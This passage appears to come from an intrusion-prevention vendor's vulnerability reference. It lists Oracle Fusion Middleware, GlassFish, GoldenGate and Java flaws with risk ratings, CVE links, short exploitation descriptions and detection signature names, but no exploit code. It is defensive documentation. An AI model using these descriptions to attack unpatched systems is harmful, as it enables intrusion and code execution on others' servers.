CVE-2014-2424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2424
BID-66871
http://www.securityfocus.com/bid/66871
OSVDB-105844
http://www.osvdb.org/105844
Back to top

Oracle-Fusion-Middleware-Information-Disclosure

About this vulnerability: An information disclosure vulnerability in Oracle Fusion Middleware.
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Oracle Fusion Middleware
Type: Insecure Configuration
Description: A vulnerability in Oracle Fusion Middleware, in the Oracle Reports Developer 'Report Server' component, versions 11.1.1.4, 11.1.1.6, and 11.1.2.0, that allow remote attackers access to sensitive information about the server. This can be used in conjuntion with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.
Situation: HTTP_CSU-Oracle-Fusion-Middleware-Information-Disclosure
References:
CVE-2012-3152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3152
BID-55955
http://www.securityfocus.com/bid/55955
OSVDB-86395
http://www.osvdb.org/86395
Back to top

Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-DirTrav

About this vulnerability: A vulnerability in Oracle Fusion Middleware MapViewer
Risk: Moderate
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Fusion Middleware
Type: Directory Traversal
Description: Improper input validation causes a directory traversal vulnerability in Oracle Fusion Middleware MapViewer. A successful exploit allows an attacker to upload and execute arbitrary code with the privileges of the server process.
Situation: HTTP_CS-Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-Directory-Traversal
References:
CVE-2017-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3230
Back to top

Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Oracle Outside In Technology
Risk: High
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Outside In Technology
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Oracle Outside In. The vulnerability is due to improper parsing of Excel files. When handling TxO records the code improperly wraps an integer value. This will result in an integer overflow causing a heap-based buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by causing an application that uses the vulnerable library to handle a malformed Excel file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation: File-OLE_Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow
Back to top

Oracle-Fusion-Middleware-Remote-Code-Execution

About this vulnerability: A remote code execution vulnerability in Oracle Fusion Middleware.
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Oracle Fusion Middleware
Type: Insecure Configuration
Description: A vulnerability in Oracle Fusion Middleware, in the Oracle Reports Developer 'Servlet' component, versions 11.1.1.4, 11.1.1.6, and 11.1.2.0, that allow remote attackers to execute arbitrary code by uploading a .jsp file.
Situation: HTTP_CRL-Oracle-Fusion-Middleware-Remote-Code-Execution
References:
CVE-2012-3153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3153
BID-55961
http://www.securityfocus.com/bid/55961
OSVDB-86394
http://www.osvdb.org/86394
Back to top

Oracle-GlassFish-Server-Malformed-Username-Cross-Site-Scripting

About this vulnerability: An attempt to exploit vulnerability in Oracle GlassFish Server detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Oracle GlassFish Server
Type: Malfunction
Description: A persistent cross site scripting vulnerability has been reported in the HTTP administration component of Oracle's GlassFish Server. The vulnerability is due to insufficient input validation on incorrect username values, which are then written to a log file.
References:
CVE-2011-2260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2260
OSVDB-73972
http://www.osvdb.org/73972
Back to top

Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities

About this vulnerability: A vulnerability in Oracle Sun GlassFish Enterprise Server
Risk: High
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle GlassFish Server
Type: Cross-site Scripting
Description: Multiple reflected cross site scripting vulnerabilities have been reported in Oracle GlassFish. The vulnerabilities are due to unsanitized parameters in various web pages in the Web Container component. A remote attacker can exploit these vulnerabilities by enticing an unauthenticated user to follow a specially crafted URL. Successful exploitation could result in attacker-controlled script code being executed in the browser context of the GlassFish Server.
Situation: HTTP_CS-Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities
References:
CVE-2012-0551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0551
OSVDB-81226
http://www.osvdb.org/81226
Back to top

Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities

About this vulnerability: A vulnerability in Oracle Sun GlassFish Enterprise Server
Risk: Low
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1349-5242
Platform: Generic
Software: Oracle GlassFish Server
Type: Input Validation
Description: Multiple cross site scripting vulnerabilities have been reported in Oracle GlassFish. The vulnerabilities are due to unsanitized parameters in various web pages in the Web Container component. A remote, unauthenticated attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted URL. Successful exploitation could result in attacker controlled script code executing in the browser context for the GlassFish Server.
Situation: HTTP_CRL-Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities
References:
CVE-2012-0551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0551
OSVDB-81227
http://www.osvdb.org/81227
Back to top

Oracle-GlassFish-Server-Themeservlet-Directory-Traversal

About this vulnerability: A vulnerability in Oracle GlassFish Server
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GlassFish Server
Type: Directory Traversal
Description: The Oracle GlassFish Server has insufficient validation of certain requests, due to which a vulnerability allowing arbitrary file download can be exploited.
Situation: HTTP_CSU-Oracle-GlassFish-Server-Themeservlet-Directory-Traversal
Back to top

Oracle-GoldenGate-Manager-Command-Report-DoS

About this vulnerability: A vulnerability in Oracle GoldenGate Manager
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GoldenGate Manager
Type: Input Validation
Description: A vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to cause a denial of service condition by sending a malformated command, due to improper handling of an incomplete REPORT command.
Situation: Generic_CS-Oracle-GoldenGate-Manager-Command-Report-DoS
References:
CVE-2018-2914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2914
Back to top

Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle GoldenGate Manager
Risk: High
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GoldenGate Manager
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to execute arbitrary code, due to an input validation error when processing an overly long command name.
Situation: Generic_CS-Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow
References:
CVE-2018-2913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2913
Back to top

Oracle-GoldenGate-Manager-Tab-Parsing-DoS

About this vulnerability: A vulnerability in Oracle GoldenGate Manager
Risk: Moderate
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GoldenGate Manager
Type: Input Validation
Description: A vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to cause a denial of service condition by sending a malformated command which is not correctly separated by TAB characters.
Situation: Generic_CS-Oracle-GoldenGate-Manager-Tab-Parsing-DoS
References:
CVE-2018-2912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2912
Back to top

Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle GoldenGate Veridata
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GoldenGate Veridata
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle GoldenGate Veridata Server. The vulnerability is due to a boundary error while parsing XML SOAP requests containing an overly long tag string. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted SOAP request to the target server. Successful exploitation would result in arbitrary code execution with SYSTEM privileges.
Situation: File-TextId_Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow
References:
CVE-2010-4416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4416
BID-45868
http://www.securityfocus.com/bid/45868
Back to top

Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636

About this vulnerability: An attempt to exploit a vulnerability in Oracle Hospitality detected
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Oracle Hospitality
Type: Input Validation
Description: A vulnerability in the Oracle Hospitality Simphony component of the Oracle Hospitality applications allows unauthenticated attackers with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability could allow reading sensitive data and receiving information about various services without any authentication.
Situation: HTTP_CRL-Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636
References:
CVE-2018-2636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2636
Back to top

Oracle-HTTP-Server-Mod-Access-Restriction-Bypass

About this vulnerability: Access restriction bypass vulnerability in Oracle HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1784-5242
Platform: Generic
Software: Oracle Application Server
Type: Malfunction
Description: There is an access restriction bypass vulnerability in Oracle HTTP Server. By exploiting this vulnerability successfully, a remote attacker can gain an access to the restricted content of the target server. This vulnerability is exploitable when the UseWebcacheIP configuration directive is disabled on the target machine.
Situation: HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass-2
HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request
References:
CVE-2005-1383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1383
BID-13418
http://www.securityfocus.com/bid/13418
OSVDB-15908
http://www.osvdb.org/15908
Back to top

Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Hyperion Strategic Finance Client
Risk: Moderate
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Hyperion Strategic Finance Client
Type: Buffer Overflow
Description: There is a heap buffer overflow in Oracle Hyperion Strategic Finance Client. The vulnerability is due to a boundary error in the SetDevNames() method of the Tidestone Formula One WorkBook TTF16.ocx ActiveX control. This can be exploited to inject and execute arbitrary code in the context of the currently logged-on user. A remote attacker could exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow
References:
OSVDB-76913
http://www.osvdb.org/76913
Back to top

Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials

About this vulnerability: A vulnerability in Oracle Identity Manager
Risk: Moderate
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Identity Manager
Type: Malfunction
Description: Oracle Identity Manager has a vulnerability, which is due to the presence of default credentials. A remote attacker can exploit the vulnerability by using the default credentials.
Situation: HTTP_CS-Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials
References:
CVE-2017-10151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10151
Back to top

Oracle-Iplanet-Web-Server-Information-Disclosure-Attack

About this vulnerability: A vulnerability in Oracle iPlanet Web Server.
Risk: High
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: Oracle iPlanet Web Server
Type: Malfunction
Description: A vulnerability in Oracles iPlanet Web Server, versions 7.0.x, which allows remote attacker to gain access to sensitive information without authentication, including encryption keys, JVM configuration and other data, by sending a modified request to a target server.
Situation: HTTP_CSU-Oracle-Iplanet-Web-Server-Information-Disclosure-Attack
References:
CVE-2020-9315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9315
Back to top

Oracle-Java-2d-Imaginglib-Integer-Overflow

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Integer Overflow
Description: A code execution vulnerability exists in the 2D component of Oracle Java. The vulnerability is due to an integer overflow in the ImagingLib class. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation of this vulnerability can result in the execution of arbitrary code on a target system in the context of the affected service.
Situation: File-Binary_Oracle-Java-2d-Imaginglib-Integer-Overflow
References:
CVE-2013-0809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809
BID-58296
http://www.securityfocus.com/bid/58296
OSVDB-90837
http://www.osvdb.org/90837
Back to top

Oracle-Java-7-Applet-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle Java Runtime Environment
Risk: Moderate
First detected in: sgpkg-ips-472-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: There is a vulnerability in Oracle Java Runtime Environment that allows remote code execution
Situation: File-Binary_Oracle-Java-7-Applet-Remote-Code-Execution
File-Zip_Oracle-Java-7-Applet-Remote-Code-Execution
References:
CVE-2012-4681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4681
OSVDB-84867
http://www.osvdb.org/84867
Back to top

Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass

About this vulnerability: A vulnerability in Oracle JDK and JRE
Risk: High
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: There is a policy bypass vulnerability in the Rhino Script engine which can be used with a Java Applet to execute Java code outside of the sandbox. The vulnerability is caused by insufficient restrictions of certain instances of the error object. An attacker can exploit this vulnerability by enticing a user with sufficient privileges to open a webpage containing a Java Applet and Javascript code running the Rhino script engine. Successful exploitation can result in the execution of arbitrary Java code with full privileges of the currently logged in user.
Situation: File-Binary_Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass
References:
CVE-2011-3544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544
BID-50218
http://www.securityfocus.com/bid/50218
OSVDB-76500
http://www.osvdb.org/76500
Back to top

Oracle-Java-Atomicreferencearray-Sandbox-Breach

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment; Oracle OpenJDK
Type: Malfunction
Description: There is a sandbox breach vulnerability in Oracle Java SE. The vulnerability is due to a design weakness in the implementation of the AtomicReferenceArray class. An unauthorized remote attacker can exploit this vulnerability by enticing the target user to open a malicious Java application or applet. Successful exploitation could breach the JRE sandbox and result in execution of arbitrary code the target system.
Situation: File-Zip_Oracle-Java-Atomicreferencearray-Sandbox-Breach
References:
CVE-2012-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507
BID-52161
http://www.securityfocus.com/bid/52161
OSVDB-78413
http://www.osvdb.org/78413
Back to top

Oracle-Java-Awt_setpixels-Information-Disclosure

About this vulnerability: A vulnerability in Oracle Java SE
Risk: Moderate
First detected in: sgpkg-ips-589-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: An information disclosure vulnerability exists in Oracle Java. The vulnerability is due to a read out of bounds error in awt_setPixels(). A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in the disclosure of the memory contents.
Situation: File-Binary_Oracle-Java-Awt_setpixels-Information-Disclosure
Back to top

Oracle-Java-Beans-Documenthandler-Xml-External-Entity

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment; Oracle Java SE Embedded; Oracle JRockit; Oracle OpenJDK
Type: Malfunction
Description: A XML external entity (XXE) vulnerability exists in Oracle Java. This is due to an incorrectly configured XML parser in the Beans DocumentHandler interface that readily processes XML external entities by default, causing classes that implement the interface to also process XML external entities. A remote unauthenticated attacker may exploit this vulnerability via specially crafted requests marshalled in XML to disclose files from the server's file system, cause a denial of service condition, perform server-side request forgery (SSRF), and bypass security policies.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2014-0423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423
BID-64914
http://www.securityfocus.com/bid/64914
BID-64758
http://www.securityfocus.com/bid/64758
OSVDB-102008
http://www.osvdb.org/102008
Back to top

Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Oracle Java SE
Risk: Moderate
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1697-5242
Platform: Generic
Software: Oracle Java SE
Type: Malfunction
Description: Improper validation of the jnlp or jnlps URI schemes causes an arbitrary file deletion vulnerability in Oracle Java SE, which can be exploited by having the user open a web page or a file.
Situation: HTTP_SHS-Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
File-Text_Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
References:
CVE-2019-2449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2449
Back to top

Oracle-Java-Filedialog.show-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Microsystems Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Oracle Java Runtime Environment. The vulnerability is caused by not validating the size of the file name passed to FileDialog dialogue box. This can be exploited to a overflow a heap buffer which could possibly lead to arbitrary code execution. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: File-Binary_Oracle-Java-Filedialog.show-Heap-Buffer-Overflow
References:
CVE-2011-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0802
Back to top

Oracle-Java-Final-Field-Overwrite

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: A design weakness vulnerability exists in Oracle Java. The vulnerability allows a user to overwrite final fields using reflection. This can result in the modification of restricted fields such as the SecurityManager. A remote attacker can exploit this vulnerability by enticing a user to view a specially crafted web page containing a Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Oracle-Java-Final-Field-Overwrite
File-Zip_Oracle-Java-Final-Field-Overwrite
References:
CVE-2013-2423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423
BID-59162
http://www.securityfocus.com/bid/59162
OSVDB-92348
http://www.osvdb.org/92348
Back to top

Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Buffer Overflow
Description: A heap memory corruption vulnerability exists in Oracle Java Runtime. The vulnerability is due to the font parsing code failing to check the "maxPoints" value used in controlling heap memory operation. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation: File-Binary_Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow
Back to top

Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to the font parsing code failing to validate the ligature subtable of the mort table in a TrueType (TTF) font file. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation: File-Binary_Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow
Back to top

Oracle-Java-Font-Processing-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle JavaFX; Oracle Java Development Kit
Type: Malfunction
Description: A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to insufficient validation of the CFF table while parsing OTF fonts. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a maliciously crafted web page containing a Java applet. This can lead to code execution in the context of the affected user.
Situation: File-Zip_Oracle-Java-Font-Processing-Memory-Corruption
References:
CVE-2013-1491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1491
OSVDB-91204
http://www.osvdb.org/91204
Back to top

Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit; Oracle SDK for Solaris
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Oracle Java.
Situation: HTTP_SS-Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
File-Text_Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
File-Text_JavaScript-Cookie-Xor-Obfuscation-Method
References:
CVE-2010-3552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552
BID-44023
http://www.securityfocus.com/bid/44023
Back to top

Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Malfunction
Description: A code execution vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to a memory corruption error in the IntegerComponentRaster class from jre/bin/awt.dll. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged-in user.
Situation: File-Binary_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
File-Zip_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
References:
CVE-2013-2471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471
BID-60659
http://www.securityfocus.com/bid/60659
OSVDB-94357
http://www.osvdb.org/94357
Back to top

Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Malfunction
Description: A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a call to toString() within a privileged block of a method in the java.sql.DriverManager class. This can allow an attacker to create a toString() method that is executed with elevated privileges. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Zip_Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass
References:
CVE-2013-1488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488
OSVDB-91472
http://www.osvdb.org/91472
Back to top

Oracle-Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to insufficient validation of segmentShift and segmentMask fields of java.util.concurrent.ConcurrentHashMap objects. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a web page containing a maliciously crafted Java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation: File-Binary_Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption
References:
CVE-2013-2426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426
OSVDB-92365
http://www.osvdb.org/92365
Back to top

Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach

About this vulnerability: A vulnerability in Oracle JRE
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Input Validation
Description: A code execution vulnerability exists in Oracle Java's Java Management Extension (JMX) library. The vulnerability is due to insecure use of certain JMX classes. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.
Situation: File-Binary_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
File-Zip_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
References:
CVE-2013-0431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431
BID-57726
http://www.securityfocus.com/bid/57726
OSVDB-89613
http://www.osvdb.org/89613
Back to top

Oracle-Java-PhantomReference-Use-After-Free

About this vulnerability: A vulnerability in Oracle Java SE
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE
Type: Malfunction
Description: A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to a use after free error when handling phantom object references in the Hotspot JVM garbage collector. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Binary_Oracle-Java-PhantomReference-Use-After-Free
References:
CVE-2015-0395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395
BID-72142
http://www.securityfocus.com/bid/72142
OSVDB-117228
http://www.osvdb.org/117228
Back to top

Oracle-Java-Private-Methodhandle-Sandbox-Bypass

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a failure to restrict access to private methods via reflection. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Oracle-Java-Private-Methodhandle-Sandbox-Bypass
References:
CVE-2013-5893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5893
BID-64863
http://www.securityfocus.com/bid/64863
BID-64758
http://www.securityfocus.com/bid/64758
OSVDB-102000
http://www.osvdb.org/102000
Back to top

Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle Java
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: A vulnerability exists in Oracle Java RMI Services. The vulnerability is due to the default configuration of the RMI Registry and RMI Activation services allowing the loading of classes from a remote URL. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RMI message to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service.
Situation: File-Zip_Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution
References:
CVE-2011-3556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556
BID-50231
http://www.securityfocus.com/bid/50231
OSVDB-76505
http://www.osvdb.org/76505
Back to top

Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-464-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Input Validation
